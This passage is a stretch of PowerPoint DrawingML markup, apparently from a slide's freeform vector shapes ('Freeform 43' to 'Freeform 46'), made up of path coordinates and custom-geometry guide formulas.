                      <a:pt x="432" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="586"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="579"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="575"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="571"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="563"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="558"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="548"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="322"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="327"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="424" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="469" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="527" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="534" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="543" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="560" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="610" y="302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="659" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="676" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="2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72" name="Freeform 43"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="489" y="2493"/>
                <a:ext cx="34" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 105"/>
                  <a:gd name="T1" fmla="*/ 0 h 61"/>
                  <a:gd name="T2" fmla="*/ 0 w 105"/>
                  <a:gd name="T3" fmla="*/ 0 h 61"/>
                  <a:gd name="T4" fmla="*/ 0 w 105"/>
                  <a:gd name="T5" fmla="*/ 0 h 61"/>
                  <a:gd name="T6" fmla="*/ 0 w 105"/>
                  <a:gd name="T7" fmla="*/ 0 h 61"/>
                  <a:gd name="T8" fmla="*/ 0 w 105"/>
                  <a:gd name="T9" fmla="*/ 0 h 61"/>
                  <a:gd name="T10" fmla="*/ 0 w 105"/>
                  <a:gd name="T11" fmla="*/ 0 h 61"/>
                  <a:gd name="T12" fmla="*/ 0 w 105"/>
                  <a:gd name="T13" fmla="*/ 0 h 61"/>
                  <a:gd name="T14" fmla="*/ 0 w 105"/>
                  <a:gd name="T15" fmla="*/ 0 h 61"/>
                  <a:gd name="T16" fmla="*/ 0 w 105"/>
                  <a:gd name="T17" fmla="*/ 0 h 61"/>
                  <a:gd name="T18" fmla="*/ 0 w 105"/>
                  <a:gd name="T19" fmla="*/ 0 h 61"/>
                  <a:gd name="T20" fmla="*/ 0 w 105"/>
                  <a:gd name="T21" fmla="*/ 0 h 61"/>
                  <a:gd name="T22" fmla="*/ 0 w 105"/>
                  <a:gd name="T23" fmla="*/ 0 h 61"/>
                  <a:gd name="T24" fmla="*/ 0 w 105"/>
                  <a:gd name="T25" fmla="*/ 0 h 61"/>
                  <a:gd name="T26" fmla="*/ 0 w 105"/>
                  <a:gd name="T27" fmla="*/ 0 h 61"/>
                  <a:gd name="T28" fmla="*/ 0 w 105"/>
                  <a:gd name="T29" fmla="*/ 0 h 61"/>
                  <a:gd name="T30" fmla="*/ 0 w 105"/>
                  <a:gd name="T31" fmla="*/ 0 h 61"/>
                  <a:gd name="T32" fmla="*/ 0 w 105"/>
                  <a:gd name="T33" fmla="*/ 0 h 61"/>
                  <a:gd name="T34" fmla="*/ 0 w 105"/>
                  <a:gd name="T35" fmla="*/ 0 h 61"/>
                  <a:gd name="T36" fmla="*/ 0 w 105"/>
                  <a:gd name="T37" fmla="*/ 0 h 61"/>
                  <a:gd name="T38" fmla="*/ 0 w 105"/>
                  <a:gd name="T39" fmla="*/ 0 h 61"/>
                  <a:gd name="T40" fmla="*/ 0 w 105"/>
                  <a:gd name="T41" fmla="*/ 0 h 61"/>
                  <a:gd name="T42" fmla="*/ 0 w 105"/>
                  <a:gd name="T43" fmla="*/ 0 h 61"/>
                  <a:gd name="T44" fmla="*/ 0 w 105"/>
                  <a:gd name="T45" fmla="*/ 0 h 61"/>
                  <a:gd name="T46" fmla="*/ 0 w 105"/>
                  <a:gd name="T47" fmla="*/ 0 h 61"/>
                  <a:gd name="T48" fmla="*/ 0 w 105"/>
                  <a:gd name="T49" fmla="*/ 0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61"/>
                  <a:gd name="T77" fmla="*/ 105 w 105"/>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61">
                    <a:moveTo>
                      <a:pt x="1" y="55"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="5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73" name="Freeform 44"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="523" y="2483"/>
                <a:ext cx="10" cy="12"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 33"/>
                  <a:gd name="T1" fmla="*/ 0 h 37"/>
                  <a:gd name="T2" fmla="*/ 0 w 33"/>
                  <a:gd name="T3" fmla="*/ 0 h 37"/>
                  <a:gd name="T4" fmla="*/ 0 w 33"/>
                  <a:gd name="T5" fmla="*/ 0 h 37"/>
                  <a:gd name="T6" fmla="*/ 0 w 33"/>
                  <a:gd name="T7" fmla="*/ 0 h 37"/>
                  <a:gd name="T8" fmla="*/ 0 w 33"/>
                  <a:gd name="T9" fmla="*/ 0 h 37"/>
                  <a:gd name="T10" fmla="*/ 0 w 33"/>
                  <a:gd name="T11" fmla="*/ 0 h 37"/>
                  <a:gd name="T12" fmla="*/ 0 w 33"/>
                  <a:gd name="T13" fmla="*/ 0 h 37"/>
                  <a:gd name="T14" fmla="*/ 0 w 33"/>
                  <a:gd name="T15" fmla="*/ 0 h 37"/>
                  <a:gd name="T16" fmla="*/ 0 w 33"/>
                  <a:gd name="T17" fmla="*/ 0 h 37"/>
                  <a:gd name="T18" fmla="*/ 0 w 33"/>
                  <a:gd name="T19" fmla="*/ 0 h 37"/>
                  <a:gd name="T20" fmla="*/ 0 w 33"/>
                  <a:gd name="T21" fmla="*/ 0 h 37"/>
                  <a:gd name="T22" fmla="*/ 0 w 33"/>
                  <a:gd name="T23" fmla="*/ 0 h 37"/>
                  <a:gd name="T24" fmla="*/ 0 w 3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7"/>
                  <a:gd name="T41" fmla="*/ 33 w 3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7">
                    <a:moveTo>
                      <a:pt x="0" y="28"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>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74" name="Freeform 45"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="566" y="2421"/>
                <a:ext cx="38" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 115"/>
                  <a:gd name="T1" fmla="*/ 0 h 115"/>
                  <a:gd name="T2" fmla="*/ 0 w 115"/>
                  <a:gd name="T3" fmla="*/ 0 h 115"/>
                  <a:gd name="T4" fmla="*/ 0 w 115"/>
                  <a:gd name="T5" fmla="*/ 0 h 115"/>
                  <a:gd name="T6" fmla="*/ 0 w 115"/>
                  <a:gd name="T7" fmla="*/ 0 h 115"/>
                  <a:gd name="T8" fmla="*/ 0 w 115"/>
                  <a:gd name="T9" fmla="*/ 0 h 115"/>
                  <a:gd name="T10" fmla="*/ 0 w 115"/>
                  <a:gd name="T11" fmla="*/ 0 h 115"/>
                  <a:gd name="T12" fmla="*/ 0 w 115"/>
                  <a:gd name="T13" fmla="*/ 0 h 115"/>
                  <a:gd name="T14" fmla="*/ 0 w 115"/>
                  <a:gd name="T15" fmla="*/ 0 h 115"/>
                  <a:gd name="T16" fmla="*/ 0 w 115"/>
                  <a:gd name="T17" fmla="*/ 0 h 115"/>
                  <a:gd name="T18" fmla="*/ 0 w 115"/>
                  <a:gd name="T19" fmla="*/ 0 h 115"/>
                  <a:gd name="T20" fmla="*/ 0 w 115"/>
                  <a:gd name="T21" fmla="*/ 0 h 115"/>
                  <a:gd name="T22" fmla="*/ 0 w 115"/>
                  <a:gd name="T23" fmla="*/ 0 h 115"/>
                  <a:gd name="T24" fmla="*/ 0 w 115"/>
                  <a:gd name="T25" fmla="*/ 0 h 115"/>
                  <a:gd name="T26" fmla="*/ 0 w 115"/>
                  <a:gd name="T27" fmla="*/ 0 h 115"/>
                  <a:gd name="T28" fmla="*/ 0 w 115"/>
                  <a:gd name="T29" fmla="*/ 0 h 115"/>
                  <a:gd name="T30" fmla="*/ 0 w 115"/>
                  <a:gd name="T31" fmla="*/ 0 h 115"/>
                  <a:gd name="T32" fmla="*/ 0 w 115"/>
                  <a:gd name="T33" fmla="*/ 0 h 115"/>
                  <a:gd name="T34" fmla="*/ 0 w 115"/>
                  <a:gd name="T35" fmla="*/ 0 h 115"/>
                  <a:gd name="T36" fmla="*/ 0 w 115"/>
                  <a:gd name="T37" fmla="*/ 0 h 115"/>
                  <a:gd name="T38" fmla="*/ 0 w 115"/>
                  <a:gd name="T39" fmla="*/ 0 h 115"/>
                  <a:gd name="T40" fmla="*/ 0 w 115"/>
                  <a:gd name="T41" fmla="*/ 0 h 115"/>
                  <a:gd name="T42" fmla="*/ 0 w 115"/>
                  <a:gd name="T43" fmla="*/ 0 h 115"/>
                  <a:gd name="T44" fmla="*/ 0 w 115"/>
                  <a:gd name="T45" fmla="*/ 0 h 115"/>
                  <a:gd name="T46" fmla="*/ 0 w 115"/>
                  <a:gd name="T47" fmla="*/ 0 h 115"/>
                  <a:gd name="T48" fmla="*/ 0 w 115"/>
                  <a:gd name="T49" fmla="*/ 0 h 115"/>
                  <a:gd name="T50" fmla="*/ 0 w 115"/>
                  <a:gd name="T51" fmla="*/ 0 h 115"/>
                  <a:gd name="T52" fmla="*/ 0 w 115"/>
                  <a:gd name="T53" fmla="*/ 0 h 115"/>
                  <a:gd name="T54" fmla="*/ 0 w 115"/>
                  <a:gd name="T55" fmla="*/ 0 h 115"/>
                  <a:gd name="T56" fmla="*/ 0 w 115"/>
                  <a:gd name="T57" fmla="*/ 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
                  <a:gd name="T88" fmla="*/ 0 h 115"/>
                  <a:gd name="T89" fmla="*/ 115 w 11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15">
                    <a:moveTo>
                      <a:pt x="0" y="110"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1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75" name="Freeform 46"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="609" y="2378"/>
                <a:ext cx="73" cy="34"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 224"/>
                  <a:gd name="T1" fmla="*/ 0 h 102"/>
                  <a:gd name="T2" fmla="*/ 0 w 224"/>
                  <a:gd name="T3" fmla="*/ 0 h 102"/>
                  <a:gd name="T4" fmla="*/ 0 w 224"/>
                  <a:gd name="T5" fmla="*/ 0 h 102"/>
                  <a:gd name="T6" fmla="*/ 0 w 224"/>
                  <a:gd name="T7" fmla="*/ 0 h 102"/>
                  <a:gd name="T8" fmla="*/ 0 w 224"/>
                  <a:gd name="T9" fmla="*/ 0 h 102"/>
                  <a:gd name="T10" fmla="*/ 0 w 224"/>
                  <a:gd name="T11" fmla="*/ 0 h 102"/>
                  <a:gd name="T12" fmla="*/ 0 w 224"/>
                  <a:gd name="T13" fmla="*/ 0 h 102"/>
                  <a:gd name="T14" fmla="*/ 0 w 224"/>
                  <a:gd name="T15" fmla="*/ 0 h 102"/>
                  <a:gd name="T16" fmla="*/ 0 w 224"/>
                  <a:gd name="T17" fmla="*/ 0 h 102"/>
                  <a:gd name="T18" fmla="*/ 0 w 224"/>
                  <a:gd name="T19" fmla="*/ 0 h 102"/>
                  <a:gd name="T20" fmla="*/ 0 w 224"/>
                  <a:gd name="T21" fmla="*/ 0 h 102"/>
                  <a:gd name="T22" fmla="*/ 0 w 224"/>
                  <a:gd name="T23" fmla="*/ 0 h 102"/>
                  <a:gd name="T24" fmla="*/ 0 w 224"/>
                  <a:gd name="T25" fmla="*/ 0 h 102"/>
                  <a:gd name="T26" fmla="*/ 0 w 224"/>
                  <a:gd name="T27" fmla="*/ 0 h 102"/>
                  <a:gd name="T28" fmla="*/ 0 w 224"/>
                  <a:gd name="T29" fmla="*/ 0 h 102"/>
                  <a:gd name="T30" fmla="*/ 0 w 224"/>
                  <a:gd name="T31" fmla="*/ 0 h 102"/>
                  <a:gd name="T32" fmla="*/ 0 w 224"/>
                  <a:gd name="T33" fmla="*/ 0 h 102"/>
                  <a:gd name="T34" fmla="*/ 0 w 224"/>
                  <a:gd name="T35" fmla="*/ 0 h 102"/>
                  <a:gd name="T36" fmla="*/ 0 w 224"/>
                  <a:gd name="T37" fmla="*/ 0 h 102"/>
                  <a:gd name="T38" fmla="*/ 0 w 224"/>
                  <a:gd name="T39" fmla="*/ 0 h 102"/>
                  <a:gd name="T40" fmla="*/ 0 w 224"/>
                  <a:gd name="T41" fmla="*/ 0 h 102"/>
                  <a:gd name="T42" fmla="*/ 0 w 224"/>
                  <a:gd name="T43" fmla="*/ 0 h 102"/>
                  <a:gd name="T44" fmla="*/ 0 w 224"/>
                  <a:gd name="T45" fmla="*/ 0 h 102"/>
                  <a:gd name="T46" fmla="*/ 0 w 224"/>
                  <a:gd name="T47" fmla="*/ 0 h 102"/>
                  <a:gd name="T48" fmla="*/ 0 w 224"/>
                  <a:gd name="T49" fmla="*/ 0 h 102"/>
                  <a:gd name="T50" fmla="*/ 0 w 224"/>
                  <a:gd name="T51" fmla="*/ 0 h 102"/>
                  <a:gd name="T52" fmla="*/ 0 w 224"/>
                  <a:gd name="T53" fmla="*/ 0 h 102"/>
                  <a:gd name="T54" fmla="*/ 0 w 224"/>
                  <a:gd name="T55" fmla="*/ 0 h 102"/>
                  <a:gd name="T56" fmla="*/ 0 w 224"/>
                  <a:gd name="T57" fmla="*/ 0 h 102"/>
                  <a:gd name="T58" fmla="*/ 0 w 224"/>
                  <a:gd name="T59" fmla="*/ 0 h 102"/>
                  <a:gd name="T60" fmla="*/ 0 w 224"/>
                  <a:gd name="T61" fmla="*/ 0 h 102"/>
                  <a:gd name="T62" fmla="*/ 0 w 224"/>
                  <a:gd name="T63" fmla="*/ 0 h 102"/>
                  <a:gd name="T64" fmla="*/ 0 w 224"/>
                  <a:gd name="T65" fmla="*/ 0 h 102"/>
                  <a:gd name="T66" fmla="*/ 0 w 224"/>
                  <a:gd name="T67" fmla="*/ 0 h 102"/>
                  <a:gd name="T68" fmla="*/ 0 w 224"/>
                  <a:gd name="T69" fmla="*/ 0 h 102"/>
                  <a:gd name="T70" fmla="*/ 0 w 224"/>
                  <a:gd name="T71" fmla="*/ 0 h 102"/>
                  <a:gd name="T72" fmla="*/ 0 w 224"/>
                  <a:gd name="T73" fmla="*/ 0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102"/>
                  <a:gd name="T113" fmla="*/ 224 w 224"/>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102">
                    <a:moveTo>
                      <a:pt x="0" y="102"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
